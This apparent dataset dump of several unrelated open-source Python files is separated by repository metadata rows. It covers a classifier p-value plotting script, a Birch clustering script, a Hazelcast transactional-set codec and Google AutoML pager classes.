ax.plot(dimensions,p_miranda_2bins,label="Miranda 2bins",color='red')
ax.plot(dimensions,p_miranda_3bins,label="Miranda 3bins",color='indianred')
ax.plot(dimensions,p_miranda_5bins,label="Miranda 5bins",color='saddlebrown')
ax.set_yscale('log')
plt.ylim([0,1])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("P value")
ax.set_title("Dimensionality analysis gaussian same projection sigmas perp .1 and 0.085")
ax.legend(loc='lower left')
fig_name="gaussian_same_projection__0_1__0_085_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../nn_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
elif MODE == 'ensemble':
dimensions=[2,3,4,5,6,7,8,9,10]
p_1_bdt = []
p_2_bdt = []
p_3_bdt = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection__0_1__0_085_bdt_p_values_1_2_3_std_dev.txt')
p_1_bdt.append(temp1), p_2_bdt.append(temp2), p_3_bdt.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_svm = []
p_2_svm = []
p_3_svm = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection__0_1__0_085_svm_ensemble_p_values_1_2_3_std_dev.txt')
p_1_svm.append(temp1), p_2_svm.append(temp2), p_3_svm.append(temp3)
print("Support vector machine : ", p_1_svm,p_2_svm,p_3_svm)
p_1_miranda_2bins = []
p_2_miranda_2bins = []
p_3_miranda_2bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+str(dim)+'D_2_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_2bins.append(temp1), p_2_miranda_2bins.append(temp2), p_3_miranda_2bins.append(temp3)
print("Miranda 2 bins: ", p_1_miranda_2bins,p_2_miranda_2bins,p_3_miranda_2bins)
p_1_miranda_3bins = []
p_2_miranda_3bins = []
p_3_miranda_3bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+str(dim)+'D_3_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_3bins.append(temp1), p_2_miranda_3bins.append(temp2), p_3_miranda_3bins.append(temp3)
print("Miranda 3 bins: ", p_1_miranda_3bins,p_2_miranda_3bins,p_3_miranda_3bins)
p_1_miranda_5bins = []
p_2_miranda_5bins = []
p_3_miranda_5bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+str(dim)+'D_5_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_5bins.append(temp1), p_2_miranda_5bins.append(temp2), p_3_miranda_5bins.append(temp3)
print("Miranda 5 bins: ", p_1_miranda_5bins,p_2_miranda_5bins,p_3_miranda_5bins)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_2_bdt,label="bdt 2$\sigma$",color='darkorange')
ax.plot(dimensions,p_2_svm,label="svm 2$\sigma$",color='lawngreen')
ax.plot(dimensions,p_2_miranda_2bins,label="Miranda 2bins 2$\sigma$",color='red')
ax.plot(dimensions,p_2_miranda_3bins,label="Miranda 3bins 2$\sigma$",color='indianred')
ax.plot(dimensions,p_2_miranda_5bins,label="Miranda 5bins 2$\sigma$",color='saddlebrown')
plt.ylim([-5,105])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("Number of samples")
ax.set_title("Dimensionality analysis")
ax.legend(loc='right')
fig_name="gaussian_same_projection__0_1__0_085_ensemble_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
elif MODE == 'ensemble_redefined':
dimensions=[2,3,4,5,6,7,8,9,10]
p_1_bdt = []
p_2_bdt = []
p_3_bdt = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_075_bdt_p_values_1_2_3_std_dev.txt')
p_1_bdt.append(temp1), p_2_bdt.append(temp2), p_3_bdt.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_svm = []
p_2_svm = []
p_3_svm = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_075_svm_p_values_1_2_3_std_dev.txt')
p_1_svm.append(temp1), p_2_svm.append(temp2), p_3_svm.append(temp3)
print("Support vector machine : ", p_1_svm,p_2_svm,p_3_svm)
p_1_miranda_2bins = []
p_2_miranda_2bins = []
p_3_miranda_2bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_2_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_2bins.append(temp1), p_2_miranda_2bins.append(temp2), p_3_miranda_2bins.append(temp3)
print("Miranda 2 bins: ", p_1_miranda_2bins,p_2_miranda_2bins,p_3_miranda_2bins)
p_1_miranda_3bins = []
p_2_miranda_3bins = []
p_3_miranda_3bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_3_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_3bins.append(temp1), p_2_miranda_3bins.append(temp2), p_3_miranda_3bins.append(temp3)
print("Miranda 3 bins: ", p_1_miranda_3bins,p_2_miranda_3bins,p_3_miranda_3bins)
p_1_miranda_5bins = []
p_2_miranda_5bins = []
p_3_miranda_5bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_5_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_5bins.append(temp1), p_2_miranda_5bins.append(temp2), p_3_miranda_5bins.append(temp3)
print("Miranda 5 bins: ", p_1_miranda_5bins,p_2_miranda_5bins,p_3_miranda_5bins)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_2_bdt,label="bdt 2$\sigma$",color='darkorange')
ax.plot(dimensions,p_2_svm,label="svm 2$\sigma$",color='lawngreen')
ax.plot(dimensions,p_2_miranda_2bins,label="Miranda 2bins 2$\sigma$",color='red')
ax.plot(dimensions,p_2_miranda_3bins,label="Miranda 3bins 2$\sigma$",color='indianred')
ax.plot(dimensions,p_2_miranda_5bins,label="Miranda 5bins 2$\sigma$",color='saddlebrown')
plt.ylim([-5,120])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("Number of samples")
ax.set_title("Dimensionality analysis redefined 0.075")
ax.legend(loc='upper left')
fig_name="gaussian_same_projection_redefined__0_1__0_075_ensemble_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
elif MODE == 'ensemble_redefined_noCPV':
dimensions=[2,3,4,5,6,7,8,9,10]
p_1_bdt = []
p_2_bdt = []
p_3_bdt = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_1_noCPV_bdt_p_values_1_2_3_std_dev.txt')
p_1_bdt.append(temp1), p_2_bdt.append(temp2), p_3_bdt.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_svm = []
p_2_svm = []
p_3_svm = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_1_noCPV_svm_p_values_1_2_3_std_dev.txt')
p_1_svm.append(temp1), p_2_svm.append(temp2), p_3_svm.append(temp3)
print("Support vector machine : ", p_1_svm,p_2_svm,p_3_svm)
p_1_miranda_2bins = []
p_2_miranda_2bins = []
p_3_miranda_2bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_2_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_2bins.append(temp1), p_2_miranda_2bins.append(temp2), p_3_miranda_2bins.append(temp3)
print("Miranda 2 bins: ", p_1_miranda_2bins,p_2_miranda_2bins,p_3_miranda_2bins)
p_1_miranda_3bins = []
p_2_miranda_3bins = []
p_3_miranda_3bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_3_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_3bins.append(temp1), p_2_miranda_3bins.append(temp2), p_3_miranda_3bins.append(temp3)
print("Miranda 3 bins: ", p_1_miranda_3bins,p_2_miranda_3bins,p_3_miranda_3bins)
p_1_miranda_5bins = []
p_2_miranda_5bins = []
p_3_miranda_5bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_5_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_5bins.append(temp1), p_2_miranda_5bins.append(temp2), p_3_miranda_5bins.append(temp3)
print("Miranda 5 bins: ", p_1_miranda_5bins,p_2_miranda_5bins,p_3_miranda_5bins)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_2_bdt,label="bdt 2$\sigma$",color='darkorange')
ax.plot(dimensions,p_2_svm,label="svm 2$\sigma$",color='lawngreen')
ax.plot(dimensions,p_2_miranda_2bins,label="Miranda 2bins 2$\sigma$",color='red')
ax.plot(dimensions,p_2_miranda_3bins,label="Miranda 3bins 2$\sigma$",color='indianred')
ax.plot(dimensions,p_2_miranda_5bins,label="Miranda 5bins 2$\sigma$",color='saddlebrown')
plt.ylim([-5,105])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("Number of samples")
ax.set_title("Dimensionality analysis redefined noCPV")
ax.legend(loc='right')
fig_name="gaussian_same_projection_redefined__0_1__0_1_noCPV_ensemble_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
elif MODE == 'ensemble_redefined_optimised':
dimensions=[2,3,4,5,6,7,8,9,10]
p_1_bdt = []
p_2_bdt = []
p_3_bdt = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_075_optimised_bdt_p_values_1_2_3_std_dev.txt')
p_1_bdt.append(temp1), p_2_bdt.append(temp2), p_3_bdt.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_svm = []
p_2_svm = []
p_3_svm = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_075_optimised_svm_p_values_1_2_3_std_dev.txt')
p_1_svm.append(temp1), p_2_svm.append(temp2), p_3_svm.append(temp3)
print("Support vector machine : ", p_1_svm,p_2_svm,p_3_svm)
p_1_nn = []
p_2_nn = []
p_3_nn = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../nn_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_075_optimised_p_values_1_2_3_std_dev.txt')
p_1_nn.append(temp1), p_2_nn.append(temp2), p_3_nn.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_miranda_2bins = []
p_2_miranda_2bins = []
p_3_miranda_2bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_2_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_2bins.append(temp1), p_2_miranda_2bins.append(temp2), p_3_miranda_2bins.append(temp3)
print("Miranda 2 bins: ", p_1_miranda_2bins,p_2_miranda_2bins,p_3_miranda_2bins)
p_1_miranda_3bins = []
p_2_miranda_3bins = []
p_3_miranda_3bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_3_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_3bins.append(temp1), p_2_miranda_3bins.append(temp2), p_3_miranda_3bins.append(temp3)
print("Miranda 3 bins: ", p_1_miranda_3bins,p_2_miranda_3bins,p_3_miranda_3bins)
p_1_miranda_5bins = []
p_2_miranda_5bins = []
p_3_miranda_5bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_5_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_5bins.append(temp1), p_2_miranda_5bins.append(temp2), p_3_miranda_5bins.append(temp3)
print("Miranda 5 bins: ", p_1_miranda_5bins,p_2_miranda_5bins,p_3_miranda_5bins)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_2_bdt,label="bdt 2$\sigma$",color='darkorange')
ax.plot(dimensions,p_2_svm,label="svm 2$\sigma$",color='lawngreen')
ax.plot(dimensions,p_2_nn,label="nn 2$\sigma$",color='blue')
ax.plot(dimensions,p_2_miranda_2bins,label="Miranda 2bins 2$\sigma$",color='red')
ax.plot(dimensions,p_2_miranda_3bins,label="Miranda 3bins 2$\sigma$",color='indianred')
ax.plot(dimensions,p_2_miranda_5bins,label="Miranda 5bins 2$\sigma$",color='saddlebrown')
plt.ylim([-5,120])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("Number of samples")
ax.set_title("Dimensionality analysis redefined 0.075")
ax.legend(loc='best')
fig_name="gaussian_same_projection_redefined__0_1__0_075_optimised_ensemble_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
elif MODE == 'ensemble_redefined_noCPV_optimised':
dimensions=[2,3,4,5,6,7,8,9,10]
p_1_bdt = []
p_2_bdt = []
p_3_bdt = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_1_noCPV_optimised_bdt_p_values_1_2_3_std_dev.txt')
p_1_bdt.append(temp1), p_2_bdt.append(temp2), p_3_bdt.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_svm = []
p_2_svm = []
p_3_svm = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_1_noCPV_optimised_svm_p_values_1_2_3_std_dev.txt')
p_1_svm.append(temp1), p_2_svm.append(temp2), p_3_svm.append(temp3)
print("Support vector machine : ", p_1_svm,p_2_svm,p_3_svm)
p_1_nn = []
p_2_nn = []
p_3_nn = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../nn_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_1_noCPV_optimised_p_values_1_2_3_std_dev.txt')
p_1_nn.append(temp1), p_2_nn.append(temp2), p_3_nn.append(temp3)
print("Neural Network 3 layers with 33 neurons : ", p_1_nn,p_2_nn,p_3_nn)
p_1_miranda_2bins = []
p_2_miranda_2bins = []
p_3_miranda_2bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_2_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_2bins.append(temp1), p_2_miranda_2bins.append(temp2), p_3_miranda_2bins.append(temp3)
print("Miranda 2 bins: ", p_1_miranda_2bins,p_2_miranda_2bins,p_3_miranda_2bins)
p_1_miranda_3bins = []
p_2_miranda_3bins = []
p_3_miranda_3bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_3_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_3bins.append(temp1), p_2_miranda_3bins.append(temp2), p_3_miranda_3bins.append(temp3)
print("Miranda 3 bins: ", p_1_miranda_3bins,p_2_miranda_3bins,p_3_miranda_3bins)
p_1_miranda_5bins = []
p_2_miranda_5bins = []
p_3_miranda_5bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_5_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_5bins.append(temp1), p_2_miranda_5bins.append(temp2), p_3_miranda_5bins.append(temp3)
print("Miranda 5 bins: ", p_1_miranda_5bins,p_2_miranda_5bins,p_3_miranda_5bins)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_2_bdt,label="bdt 2$\sigma$",color='darkorange')
ax.plot(dimensions,p_2_svm,label="svm 2$\sigma$",color='lawngreen')
ax.plot(dimensions,p_2_nn,label="nn 2$\sigma$",color='blue')
ax.plot(dimensions,p_2_miranda_2bins,label="Miranda 2bins 2$\sigma$",color='red')
ax.plot(dimensions,p_2_miranda_3bins,label="Miranda 3bins 2$\sigma$",color='indianred')
ax.plot(dimensions,p_2_miranda_5bins,label="Miranda 5bins 2$\sigma$",color='saddlebrown')
plt.ylim([-5,105])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("Number of samples")
ax.set_title("Dimensionality analysis redefined noCPV")
ax.legend(loc='right')
fig_name="gaussian_same_projection_redefined__0_1__0_1_noCPV_optimised_ensemble_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
else:
print("No valid mode entered")
| mit | 7,951,414,230,523,062,000 | 46.66886 | 213 | 0.643097 | false | 2.567868 | false | false | false |
jaytlennon/Image-Analysis | python/using_scikit_learn_clustering.py | 4 | 1566 | from itertools import cycle
from time import time
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from sklearn.preprocessing import StandardScaler
from sklearn.cluster import Birch
from PIL import Image
import sys
import os
mydir = os.path.expanduser("~/GitHub/Image-Analysis")
# Read image
img = Image.open(mydir + '/photos/test.jpg').convert('RGBA')
arr = np.array(img)
X = arr.ravel()
fig = plt.figure()
plt.imshow(img, cmap=plt.cm.gray)
plt.savefig(mydir + '/results/photos/image_as_analyzable_object.png')
# Compute clustering with Birch
birch_models = [Birch(threshold=1.7, n_clusters=None)]
#for ind, (birch_model, info) in enumerate(zip(birch_models, final_step)):
t1 = time()
birch_model.fit(X)
t2 = time()
print("Birch %s as the final step took %0.2f seconds" % (info, (t2))
# Plot result
labels = birch_model.labels_
centroids = birch_model.subcluster_centers_
n_clusters = np.unique(labels).size
print("n_clusters : %d" % n_clusters)
ax = fig.add_subplot(1, 1, 1)
for this_centroid, k, col in zip(centroids, range(n_clusters), colors):
mask = labels == k
ax.plot(X[mask, 0], X[mask, 1], 'w',
markerfacecolor=col, marker='.')
if birch_model.n_clusters is None:
ax.plot(this_centroid[0], this_centroid[1], '+', markerfacecolor=col,
markeredgecolor='k', markersize=5)
ax.set_ylim([-25, 25])
ax.set_xlim([-25, 25])
ax.set_autoscaley_on(False)
ax.set_title('Birch %s' % info)
#cv2.imwrite(mydir + '/results/photos/using_scikit_learn_clustering.png', fig)
| mit | -2,141,438,698,161,400,000 | 26.473684 | 78 | 0.697318 | false | 2.847273 | false | false | false |
hazelcast/hazelcast-python-client | hazelcast/protocol/codec/transactional_set_remove_codec.py | 1 | 1225 | from hazelcast.serialization.bits import *
from hazelcast.protocol.builtin import FixSizedTypesCodec
from hazelcast.protocol.client_message import OutboundMessage, REQUEST_HEADER_SIZE, create_initial_buffer, RESPONSE_HEADER_SIZE
from hazelcast.protocol.builtin import StringCodec
from hazelcast.protocol.builtin import DataCodec
# hex: 0x100200
_REQUEST_MESSAGE_TYPE = 1049088
# hex: 0x100201
_RESPONSE_MESSAGE_TYPE = 1049089
_REQUEST_TXN_ID_OFFSET = REQUEST_HEADER_SIZE
_REQUEST_THREAD_ID_OFFSET = _REQUEST_TXN_ID_OFFSET + UUID_SIZE_IN_BYTES
_REQUEST_INITIAL_FRAME_SIZE = _REQUEST_THREAD_ID_OFFSET + LONG_SIZE_IN_BYTES
_RESPONSE_RESPONSE_OFFSET = RESPONSE_HEADER_SIZE
def encode_request(name, txn_id, thread_id, item):
buf = create_initial_buffer(_REQUEST_INITIAL_FRAME_SIZE, _REQUEST_MESSAGE_TYPE)
FixSizedTypesCodec.encode_uuid(buf, _REQUEST_TXN_ID_OFFSET, txn_id)
FixSizedTypesCodec.encode_long(buf, _REQUEST_THREAD_ID_OFFSET, thread_id)
StringCodec.encode(buf, name)
DataCodec.encode(buf, item, True)
return OutboundMessage(buf, False)
def decode_response(msg):
initial_frame = msg.next_frame()
return FixSizedTypesCodec.decode_boolean(initial_frame.buf, _RESPONSE_RESPONSE_OFFSET)
| apache-2.0 | -3,358,503,309,228,034,600 | 41.241379 | 127 | 0.781224 | false | 3.165375 | false | false | false |
googleapis/googleapis-gen | google/cloud/automl/v1/automl-v1-py/google/cloud/automl_v1/services/auto_ml/pagers.py | 1 | 15766 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterable, Awaitable, Callable, Iterable, Sequence, Tuple, Optional
from google.cloud.automl_v1.types import dataset
from google.cloud.automl_v1.types import model
from google.cloud.automl_v1.types import model_evaluation
from google.cloud.automl_v1.types import service
class ListDatasetsPager:
"""A pager for iterating through ``list_datasets`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListDatasetsResponse` object, and
provides an ``__iter__`` method to iterate through its
``datasets`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListDatasets`` requests and continue to iterate
through the ``datasets`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListDatasetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., service.ListDatasetsResponse],
request: service.ListDatasetsRequest,
response: service.ListDatasetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListDatasetsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListDatasetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListDatasetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[service.ListDatasetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[dataset.Dataset]:
for page in self.pages:
yield from page.datasets
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListDatasetsAsyncPager:
"""A pager for iterating through ``list_datasets`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListDatasetsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``datasets`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListDatasets`` requests and continue to iterate
through the ``datasets`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListDatasetsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[service.ListDatasetsResponse]],
request: service.ListDatasetsRequest,
response: service.ListDatasetsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListDatasetsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListDatasetsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListDatasetsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[service.ListDatasetsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[dataset.Dataset]:
async def async_generator():
async for page in self.pages:
for response in page.datasets:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListModelsPager:
"""A pager for iterating through ``list_models`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListModelsResponse` object, and
provides an ``__iter__`` method to iterate through its
``model`` field.
If there are more pages, the ``__iter__`` method will make additional
``ListModels`` requests and continue to iterate
through the ``model`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListModelsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., service.ListModelsResponse],
request: service.ListModelsRequest,
response: service.ListModelsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiate the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListModelsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListModelsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListModelsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
def pages(self) -> Iterable[service.ListModelsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = self._method(self._request, metadata=self._metadata)
yield self._response
def __iter__(self) -> Iterable[model.Model]:
for page in self.pages:
yield from page.model
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListModelsAsyncPager:
"""A pager for iterating through ``list_models`` requests.
This class thinly wraps an initial
:class:`google.cloud.automl_v1.types.ListModelsResponse` object, and
provides an ``__aiter__`` method to iterate through its
``model`` field.
If there are more pages, the ``__aiter__`` method will make additional
``ListModels`` requests and continue to iterate
through the ``model`` field on the
corresponding responses.
All the usual :class:`google.cloud.automl_v1.types.ListModelsResponse`
attributes are available on the pager. If multiple requests are made, only
the most recent response is retained, and thus used for attribute lookup.
"""
def __init__(self,
method: Callable[..., Awaitable[service.ListModelsResponse]],
request: service.ListModelsRequest,
response: service.ListModelsResponse,
*,
metadata: Sequence[Tuple[str, str]] = ()):
"""Instantiates the pager.
Args:
method (Callable): The method that was originally called, and
which instantiated this pager.
request (google.cloud.automl_v1.types.ListModelsRequest):
The initial request object.
response (google.cloud.automl_v1.types.ListModelsResponse):
The initial response object.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
self._method = method
self._request = service.ListModelsRequest(request)
self._response = response
self._metadata = metadata
def __getattr__(self, name: str) -> Any:
return getattr(self._response, name)
@property
async def pages(self) -> AsyncIterable[service.ListModelsResponse]:
yield self._response
while self._response.next_page_token:
self._request.page_token = self._response.next_page_token
self._response = await self._method(self._request, metadata=self._metadata)
yield self._response
def __aiter__(self) -> AsyncIterable[model.Model]:
async def async_generator():
async for page in self.pages:
for response in page.model:
yield response
return async_generator()
def __repr__(self) -> str:
return '{0}<{1!r}>'.format(self.__class__.__name__, self._response)
class ListModelEvaluationsPager:
"""A pager for iterating through ``list_model_evaluations`` requests.
